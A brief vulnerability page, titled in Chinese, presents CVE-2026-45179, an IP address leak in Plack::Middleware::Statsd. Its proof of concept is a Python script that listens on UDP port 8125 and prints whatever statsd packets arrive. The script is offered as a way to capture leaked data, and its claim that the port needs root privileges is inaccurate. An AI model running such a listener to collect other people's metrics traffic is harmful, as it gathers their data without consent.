CVE-2026-45179 Plack::Middleware::Statsd IP地址泄露漏洞

import socket # Simple PoC: Sniffing UDP packets to demonstrate IP leakage in Plack::Middleware::Statsd # This script listens on UDP port 8125 (default statsd port) # Requires root/admin privileges to bind to the port. UDP_IP = "0.0.0.0" UDP_PORT = 8125 sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: sock.bind((UDP_IP, UDP_PORT)) print(f"[*] Listening on {UDP_IP}:{UDP_PORT} for statsd traffic...") while True: data, addr = sock.recvfrom(1024) # buffer size is 1024 bytes message = data.decode("utf-8", errors='ignore') # In a real scenario, regex would parse specific stat patterns containing IPs print(f"[+] Captured packet from {addr}: {message}") except PermissionError: print("[!] Error: Permission denied. Run as root/admin.") except KeyboardInterrupt: print("\n[*] Stopping listener.") finally: sock.close()